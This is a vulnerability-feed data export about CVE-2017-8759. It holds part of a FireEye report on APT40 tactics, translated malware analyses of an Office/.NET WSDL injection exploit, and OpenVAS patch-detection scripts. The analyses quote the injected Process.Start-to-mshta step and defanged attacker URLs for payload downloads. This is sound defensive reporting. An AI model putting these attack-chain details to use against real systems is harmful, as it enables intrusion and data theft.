methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP). 
For each new system compromised, the group usually executes malware, performs additional reconnaissance, and steals data.\n\n * APT40 also uses native Windows utilities such as at.exe (a task scheduler) and net.exe (a network resources management tool) for lateral movement.\n * Publicly available tunneling tools are leveraged alongside distinct malware unique to the operation.\n * Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement.\n * APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services.\n\n_Maintain Presence_\n\nAPT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment. These tools enable continued control of key systems in the targeted network.\n\n * APT40 strongly favors web shells for maintaining presence, especially publicly available tools.\n * Tools used during the Establish Foothold phase also continue to be used in the Maintain Presence phase; this includes AIRBREAK and PHOTO.\n * Some APT40 malware tools can evade typical network detection by leveraging legitimate websites, such as GitHub, Google, and Pastebin for initial C2 communications.\n * Common TCP ports 80 and 443 are used to blend in with routine network traffic.\n\n_Complete Mission_\n\nCompleting missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. 
We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft.\n\n#### Outlook and Implications\n\nDespite increased public attention, APT40 continues to conduct cyber espionage operations following a regular tempo, and we anticipate their operations will continue through at least the near and medium term. Based on APT40\u2019s broadening into election-related targets in 2017, we assess with moderate confidence that the group\u2019s future targeting will affect additional sectors beyond maritime, driven by events such as China\u2019s Belt and Road Initiative. In particular, as individual Belt and Road projects unfold, we are likely to see continued activity by APT40 which extends against the project\u2019s regional opponents.\n", "modified": "2019-03-04T13:00:00", "published": "2019-03-04T13:00:00", "id": "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "href": "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", "type": "fireeye", "title": "APT40: Examining a China-Nexus Espionage Actor", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "myhack58": [{"lastseen": "2017-09-15T19:42:23", "bulletinFamily": "info", "cvelist": ["CVE-2017-8759"], "edition": 1, "description": "Event overview \nOn August 24, the 360 Core Security Division captured a new high-level targeted attack delivered through Office documents. On September 12, Microsoft released a large batch of security updates, including the fix for CVE-2017-8759; at the same time, FireEye published its discovery of in-the-wild exploitation of CVE-2017-8759. Because the vulnerability affects a wide range of systems and is easy to exploit, 360CERT is following up with an urgent analysis. Please stay alert. \nRisk level \n[+]Major \nScope of impact \nMicrosoft .NET Framework 4.7 \nMicrosoft .NET Framework 4.6.2 \nMicrosoft .NET Framework 4.6.1 \nMicrosoft .
NET Framework 4.6 \nMicrosoft .NET Framework 4.5.2 \nMicrosoft .NET Framework 3.5.1 \nMicrosoft .NET Framework 3.5 \nMicrosoft .NET Framework 2.0 SP2 \nLocating the vulnerability \nCVE-2017-8759 originates in defective handling of WSDL XML: if the supplied data contains a CRLF sequence, IsValidUrl does not validate it correctly. In the .NET source code, the handling function is located here: \n![](/Article/UploadPic/2017-9/2017915235959840.png?www.myhack58.com) \nAnd the point at which the vulnerability is triggered: \n![](/Article/UploadPic/2017-9/2017916000346.png?www.myhack58.com) \nHere the function generates a .cs file and calls csc.exe to compile it into a DLL; the captured .cs source file and the generated DLL: \n![](/Article/UploadPic/2017-9/2017916000274.png?www.myhack58.com) \nThe complete process is: \n1\\. Request the malicious SOAP WSDL \n2\\. The IsValidUrl check in the .NET Framework System.Runtime.Remoting.ni.dll is defective \n3\\. The malicious code is written into a .cs file by PrintClientProxy in the .NET Framework System.Runtime.Remoting.ni.dll \n4\\. csc.exe compiles the .cs file into a DLL \n5\\. Office loads the DLL \n6\\. The malicious code executes \nVulnerability verification \n![](/Article/UploadPic/2017-9/2017916000520.jpg) \nRemediation \n360 Security Guard already detects and removes the attack samples exploiting this vulnerability. Users should not open unsolicited Office documents for the time being, and organisations should also be on alert for targeted intrusions using such 0day vulnerabilities; 360 Internet Security Guard can be used to patch the vulnerability and block attacks exploiting it. 
\nSecurity advisory: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8759\n", "modified": "2017-09-15T00:00:00", "published": "2017-09-15T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/89305.htm", "id": "MYHACK58:62201789305", "title": "Microsoft .NET Framework vulnerability (CVE-2017-8759) alert - vulnerability alert - the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-09-21T19:40:26", "bulletinFamily": "info", "cvelist": ["CVE-2017-0199", "CVE-2017-8759"], "edition": 1, "description": "0x1 Details \nIn recent days, Tencent PC Manager captured a new Office document virus sample, which analysis shows to be an in-the-wild exploit of the .NET Framework vulnerability (CVE-2017-8759) that Microsoft had just patched on September 12. Like the earlier RTF vulnerability (CVE-2017-0199), a user is compromised simply by opening the malicious Office document. \n0x2 Analysis of how CVE-2017-8759 is exploited \nCVE-2017-8759 is essentially a .NET Framework vulnerability and affects all mainstream .NET Framework versions: \nMicrosoft .NET Framework 4.6.2 \nMicrosoft .NET Framework 4.6.1 \nMicrosoft .NET Framework 3.5.1 \nMicrosoft .NET Framework 4.7 \nMicrosoft .NET Framework 4.6 \nMicrosoft .NET Framework 4.5.2 \nMicrosoft .NET Framework 3.5 \nMicrosoft .NET Framework 2.0 SP2 \n...... \nSince mainstream operating system platforms such as Windows 7 and Windows 10 install .NET Framework by default, any software that uses SOAP services can trigger the vulnerability through .NET Framework. 
It can also be embedded in an Office document: the user only has to double-click to open the document, with no further interaction, to trigger the vulnerability and achieve arbitrary code execution. The vulnerability lies in the PrintClientProxy function at http://referencesource.microsoft.com/#System.Runtime.Remoting/metadata/wsdl, which parses the WSDL file and generates .cs code from the information obtained: \n![](/Article/UploadPic/2017-9/201792123156489.png?www.myhack58.com) \nFigure 1: parser.cs code section \nsoap:address location specifies the URL of the SOAP service; at lines 6142 and 6149, the WsdlParser.IsValidUrl() function is called to format the URL specified by location: \n![](/Article/UploadPic/2017-9/201792123156471.png?www.myhack58.com) \nFigure 2: IsValidUrl function code snippet \nThis function is simple: it takes the parsed URL, prepends @\" and appends \". For example, if the URL string is http://guanjia.qq.com, it is formatted as @\"http://guanjia.qq.com\" and returned to the caller. Lines 6148, 6149 and 6150 then format it into the following code: \n// base.ConfigureProxy(this.GetType(), @\"http://guanjia.qq.com\"); \nA WSDL file can specify multiple locations. As the code above shows, only the first location is used; from the second onward the line is prefixed with the comment marker //, so the whole URL is written into the .cs code as comment text. A csc.exe process is then created, which compiles the code into a DLL with a name like http*****.dll, and this DLL is loaded into the Office process. Because the final compiled DLL contains nothing of the commented-out URLs, under normal circumstances nothing happens here. 
\nHowever, the WsdlParser.IsValidUrl() function does not consider the case where the output string contains a newline character. For example, the sample we captured specifies a location as shown below: \n![](/Article/UploadPic/2017-9/201792123156751.png?www.myhack58.com) \nFigure 3: the location code captured from the sample \nAfter formatting by WsdlParser.IsValidUrl(), the following code is generated: \n![](/Article/UploadPic/2017-9/201792123156206.png?www.myhack58.com) \nFigure 4: the code generated after IsValidUrl formatting \nWe can see that the comment marker // only comments out base.ConfigureProxy(this.GetType(), @\"; because of the newline, it does not comment out the following 4 lines of code, which are compiled into http*****.dll and executed when the Office process loads it. \nThe malicious sample simply constructs a specially structured SOAP XML, as follows: \n![](/Article/UploadPic/2017-9/201792123156630.png?www.myhack58.com) \nFigure 5: the SOAP XML structure of the malicious sample \nThen the line System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]); creates the mshta.exe process, which pulls the corresponding script and executes the malicious code. \n0x3 Sample analysis \nThe captured in-the-wild sample spreads by e-mail, and its main targets are people working in foreign trade. The attacker sends the target a phishing e-mail with an attached document named order.doc crafted to exploit the vulnerability, luring the targeted user into opening it. 
Once the document is carelessly opened, the vulnerability is triggered and a remote-control Trojan is implanted, leading to leakage of private information. \nThe sample's process launch chain is as follows: \n![](/Article/UploadPic/2017-9/201792123156892.png?www.myhack58.com) \nFigure 6: the sample's launch chain \n1. Document execution analysis: \nWhen the document is opened, it pulls the .db file from the control server http://endlesspaws[.]com/plas/word[.]db; the file embeds a VBScript script, which mshta.exe parses and executes: \n![](/Article/UploadPic/2017-9/201792123156288.png?www.myhack58.com) \nFigure 7: the embedded VBScript script code \nIt first cleans up the generated .cs code file and the compiled .pdb and .dll files, then downloads Trojan file a from the attacker-controlled remote control server: \nhttp://endlesspaws[.]com/plas/under[.]php?hhh=5 \n2. Analysis of virus a: \nThe sample is a downloader; it downloads virus file b from the same server: \nhttp://endlesspaws[.]com/plas/under[.]php?
hhh=2 \n\n\n**[1] [[2]](<89425_2.htm>) [next](<89425_2.htm>)**\n", "modified": "2017-09-21T00:00:00", "published": "2017-09-21T00:00:00", "id": "MYHACK58:62201789425", "href": "http://www.myhack58.com/Article/html/3/62/2017/89425.htm", "title": "The latest exposure of the RTF vulnerability beside the use of research to explore the topic guide-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-13T19:14:34", "bulletinFamily": "info", "cvelist": ["CVE-2017-0199"], "edition": 1, "description": "Recently, the analysis team of the 360 Core Security Division discovered a new type of high-level targeted attack using Office documents. The attack exploits the .NET Framework vulnerability that Microsoft had just patched on September 12; when the in-the-wild exploit was found it was still a 0day, and a user is compromised simply by opening the malicious Office document. The exploit technique is the same as that of this year's winner of the Best Client-Side Bug at the Pwnie Awards, the hackers' \"Oscars\" (CVE-2017-0199); the difference is that the attackers embed a new Moniker object in the Office document and use a .NET library vulnerability to execute remote malicious .NET code when the Office document is loaded. The culprit behind the whole vulnerability turns out to be a mistake in how .NET Framework handles a newline character. 
\nAttack impact analysis \nBy tracking the server file timestamps of a series of in-the-wild samples, we have reason to believe that the vulnerability was being exploited in the wild as early as August 16, 2017, or even earlier, and that it was exploited while still a 0day; today Microsoft released an urgent .NET Framework patch fixing the vulnerability. \n![](/Article/UploadPic/2017-9/2017913201828446.png?www.myhack58.com) \nThis vulnerability affects all mainstream .NET Framework versions. Because mainstream Windows operating systems have .NET Framework built in by default, and the attacker carries out the attack by embedding remote malicious .NET code in an Office document, all users of Windows systems with Office software installed are affected. The vulnerability details have already been published on a small scale abroad, and attacks are likely to become widespread. \nMicrosoft .NET Framework 4.6.2 \nMicrosoft .NET Framework 4.6.1 \nMicrosoft .NET Framework 3.5.1 \nMicrosoft .NET Framework 4.7 \nMicrosoft .NET Framework 4.6 \nMicrosoft .NET Framework 4.5.2 \nMicrosoft .NET Framework 3.5 \nMicrosoft .NET Framework 2.0 SP2 \n0day vulnerability details analysis \nIn the SOAP WSDL parsing module of the .NET library, the IsValidUrl function does not correctly handle the case where its input contains a carriage return/newline, leading to a code injection and execution vulnerability in the function PrintClientProxy, which calls it. \n![](/Article/UploadPic/2017-9/2017913201828596.png?www.myhack58.com) \nScreenshot of the calling function: \n\n![](/Article/UploadPic/2017-9/2017913201828256.png?www.myhack58.
com) \nUnder normal circumstances, when the file contains multiple soap:address locations, the code generated by PrintClientProxy uses only the first line and comments out the others. \nBut this code does not consider that the soap:address location content may contain a newline character; as a result the comment marker \"//\" only disables the first line, and the rest of the content is compiled and executed as valid code. \nThe malicious sample constructs and outputs SOAP XML data as shown in the figure below \n![](/Article/UploadPic/2017-9/2017913201828977.png?www.myhack58.com) \nBecause the vulnerable parsing library mishandles the newline in the SOAP XML data, csc.exe compiles and runs the injected .NET code \n![](/Article/UploadPic/2017-9/2017913201828949.png?www.myhack58.com) \nAnalysis of the sample's attack process \nAbove we examined an in-the-wild sample exploiting the vulnerability; the document carrying the exploit is in RTF format. The sample uses the same objupdate update mechanism as CVE-2017-0199, pulling a SOAP XML file from the remote server through a SOAP Moniker and having the SOAP WSDL module of the .NET library parse it. \n\n![](/Article/UploadPic/2017-9/2017913201828677.png?www.myhack58.com) \n![](/Article/UploadPic/2017-9/2017913201829309.png?www.myhack58.com) \nThe complete execution flow of the vulnerability is as follows: \n![](/Article/UploadPic/2017-9/2017913201829375.png?www.myhack58.com) \nAnalysis of the sample's attack script loading \nOnce the malicious SOAP XML file has been pulled down locally and parsed by the SOAP WSDL library, the vulnerability is triggered and csc.exe compiles and executes the .NET code within it. \n![](/Article/UploadPic/2017-9/2017913201829780.png?www.myhack58.
com) \nThe code uses the System.Diagnostics.Process.Start interface to invoke mshta.exe, which loads and executes a remote HTA script. \n![](/Article/UploadPic/2017-9/2017913201829266.png?www.myhack58.com) \nThe malicious HTA script is embedded in a binary stream file with a .db extension and has been given some obfuscation to disguise it. \n![](/Article/UploadPic/2017-9/2017913201829692.png?www.myhack58.com) \nFinally, the sample uses PowerShell to download and run a PE payload disguised under an Office patch file name. \n![](/Article/UploadPic/2017-9/2017913201829765.png?www.myhack58.com) \n\nBrief analysis of the sample's PE payload \nOur analysis of the PE payload found that the sample uses heavy code obfuscation and virtual-machine techniques specifically to hinder researchers' analysis; the virtual-machine encryption framework is relatively complex, and the rough flow is as follows. \n\n\n**[1] [[2]](<89251_2.htm>) [next](<89251_2.htm>)**\n", "modified": "2017-09-13T00:00:00", "published": "2017-09-13T00:00:00", "id": "MYHACK58:62201789251", "href": "http://www.myhack58.com/Article/html/3/62/2017/89251.htm", "title": "A newline character causes the Oscar vulnerability 0day (CVE-2017-8759) to reappear - latest Office highest-level threat attack warning - vulnerability warning - the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-13T15:28:22", "bulletinFamily": "info", "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", 
"CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "description": "This article is an extended summary of my presentation at BlueHat Shanghai 2019. In it, I summarise the Office-related 0day/1day vulnerabilities from 2010 to 2018. I go through each type of vulnerability in turn and, for each vulnerability, reference and categorise the related analysis articles. \nI hope this article can help those who go on to do Office vulnerability research. \n\nOverview \nFrom 2010 to 2018, Office 0day/1day attacks never stopped. The CVE numbers below are the 0day/1day vulnerabilities for which I personally observed actual attack samples in the course of my research (there may be some omissions; readers are welcome to supplement them). \nLet us first look at the specific CVE numbers. \n| Year | Number |\n| --- | --- |\n| 2010 | CVE-2010-3333 |\n| 2011 | CVE-2011-0609/CVE-2011-0611 |\n| 2012 | CVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 |\n| 2013 | CVE-2013-0634/CVE-2013-3906 |\n| 2014 | CVE-2014-1761/CVE-2014-4114/CVE-2014-6352 |\n| 2015 | CVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 |\n| 2016 | CVE-2016-4117/CVE-2016-7193/CVE-2016-7855 |\n| 2017 | CVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 |\n| 2018 | CVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 |\nWe first classify the vulnerabilities above by component type. Note that Flash itself is also an ActiveX control; in the following table I treat it as a separate class. 
\n| Component type | Number |\n| --- | --- |\n| RTF control word parsing problems | CVE-2010-3333/CVE-2014-1761/CVE-2016-7193 |\n| Open XML tag parsing problems | CVE-2015-1641/CVE-2017-11826 |\n| ActiveX control parsing problems | CVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 |\n| Office embedded Flash vulnerabilities | CVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 |\n| Office TIFF image parsing vulnerability | CVE-2013-3906 |\n| Office EPS file parsing vulnerabilities | CVE-2015-2545/CVE-2017-0261/CVE-2017-0262 |\n| Loading vulnerabilities by means of a Moniker | CVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 |\n| Other Office logic vulnerabilities | CVE-2014-4114/CVE-2014-6352/CVE-2015-0097 |\nWe then classify the non-Flash vulnerabilities above by vulnerability type. For a summary of the Flash vulnerabilities, refer to other researchers' articles. \n| Vulnerability type | Number |\n| --- | --- |\n| Stack overflow (Stack Overflow) | CVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 |\n| Heap out-of-bounds write (Out-of-bound Write) | CVE-2014-1761/CVE-2016-7193 |\n| Type confusion (Type Confusion) | CVE-2015-1641/CVE-2017-11826/CVE-2017-0262 |\n| Use after free (Use After Free) | CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 |\n| Integer overflow (Integer Overflow) | CVE-2013-3906 |\n| Logic vulnerabilities (Logical vulnerability) | CVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 |\nNext, following the second table above, we look at these vulnerabilities one by one, excluding the Flash vulnerabilities. \n\nRTF control word parsing problems \nCVE-2010-3333 \nThis vulnerability was found by wushi, head of Keen Security Lab. It is a stack overflow vulnerability. 
\nThere are many analysis articles on this vulnerability on the Kanxue forum; a few are listed below. \nCVE-2010-3333 vulnerability analysis (in-depth analysis) \nMS10-087: from vulnerability to patch to POC \nSection 4 of Chapter 2 of The Vulnerability War also describes this vulnerability fairly systematically; interested readers can read the relevant chapters. \nCVE-2014-1761 \nThis vulnerability is a 0day found by Google. It is a heap out-of-bounds write vulnerability. \nHaifei Li did a very good analysis of it. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nThe Kanxue forum also has two high-quality analysis articles on it. \nCVE-2014-1761 analysis notes \nms14-017 (cve-2014-1761) study notes (which mention how to set up the right environment) \nAnquanke also has a high-quality analysis of it. \nHands-on: how to construct Office exploits (EXP), part 3 \nIn addition, South Korea's AhnLab also published a report on this vulnerability. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nWhen debugging this vulnerability, note that the conditions under which some samples trigger are quite demanding; the articles mention how to build a suitable experimental environment. \nCVE-2016-7193 \nThis vulnerability is a 0day reported to Microsoft by the Austrian Military Cyber Emergency Readiness Team. \nIt is also a heap out-of-bounds write vulnerability. \nBaidu Security Lab did a fairly complete analysis of it. \nAPT attack weapon: the Word vulnerability CVE-2016-7193 and its principles revealed \nI also wrote an article sharing my analysis of how to exploit this vulnerability. 
\nBuilding a calculator-popping exploit for CVE-2016-7193 from an in-the-wild sample \n\nOpen XML tag parsing problems \nCVE-2015-1641 \nOne of the 2015 0days listed in Google's 0day summary table. \nThis is a type confusion vulnerability. \nFortinet has written an analysis article about it. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAlibaba Security also wrote a good analysis of it. \nAnalysis of the Word type confusion vulnerability CVE-2015-1641 \nAnquanke also has a good analysis of it. \nHands-on: how to construct Office exploits (EXP), part 4 \nKnownsec 404 Lab also wrote a good analysis of it. \nCVE-2015-1641 Word exploit sample analysis \nI have also written an article on the principles of this vulnerability. \nAn approach to analysing Open XML tag parsing vulnerabilities \nWhen debugging this sample, which involves heap spraying in Office, pay special attention to the fact that debugger intervention tends to affect the process heap layout, in particular some heap option settings. If the sample's behaviour cannot be triggered normally while debugging, which is often the result of launching the sample directly under the debugger, try double-clicking the sample and then attaching the debugger. 
\n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-08T23:25:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040980", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811322", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811322", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040980)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040980)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811322\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 14:11:50 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040980)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040980\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists\n when Microsoft .NET Framework processes untrusted input. An attacker who\n successfully exploited this vulnerability in software using the .NET framework\n could take control of an affected system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5.1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040980\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp( win7:2, win7x64:2, win2008r2:2 ) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotpath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotpath && \"\\Microsoft.NET\\Framework\" >< dotpath)\n {\n dllVer = fetch_file_version(sysPath:dotpath, file_name:\"System.dll\");\n if(dllVer)\n {\n ##.NET Framework 3.5.1 for Windows Server 2012: September 12, 2017\n if(version_in_range(version:dllVer, test_version:\"2.0.50727.8000\", test_version2:\"2.0.50727.8769\"))\n {\n report = 'File checked: ' + dotpath + \"\\system.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 2.0.50727.8000 - 2.0.50727.8769' + '\\n' ;\n security_message(data:report);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:24:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8759"], "description": "This host is missing an important security\n update according to Microsoft KB4040974", "modified": "2020-06-04T00:00:00", "published": "2017-09-13T00:00:00", "id": "OPENVAS:1361412562310811326", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811326", "type": "openvas", "title": "Microsoft .NET Framework Remote Code Execution 
Vulnerability (KB4040974)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040974)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811326\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8759\");\n script_bugtraq_id(100742);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-09-13 15:24:00 +0530 (Wed, 13 Sep 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft .NET Framework Remote Code Execution Vulnerability (KB4040974)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4040974\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present 
on the target host.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists\n when Microsoft .NET Framework processes untrusted input. An attacker who\n successfully exploited this vulnerability in software using the .NET framework\n could take control of an affected system.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to execute code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.5.2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4040974\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8_1:1, win8_1x64:1, win2012R2:1) <= 0){\n exit(0);\n}\n\nkey = \"SOFTWARE\\Microsoft\\ASP.NET\\\";\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n dotpath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotpath && \"\\Microsoft.NET\\Framework\" >< dotpath)\n {\n dllVer = fetch_file_version(sysPath:dotpath, file_name:\"System.dll\");\n if(dllVer)\n {\n ## .NET Framework 4.5.2 for Windows 8.1 and Windows Server 2012 R2: September 12, 2017\n if(version_in_range(version:dllVer, test_version:\"4.0.30319.36000\", test_version2:\"4.0.30319.36410\"))\n {\n report = 'File checked: ' + dotpath + \"\\system.dll\" + '\\n' +\n 'File version: ' + dllVer + '\\n' +\n 'Vulnerable range: 4.0.30319.36000 - 
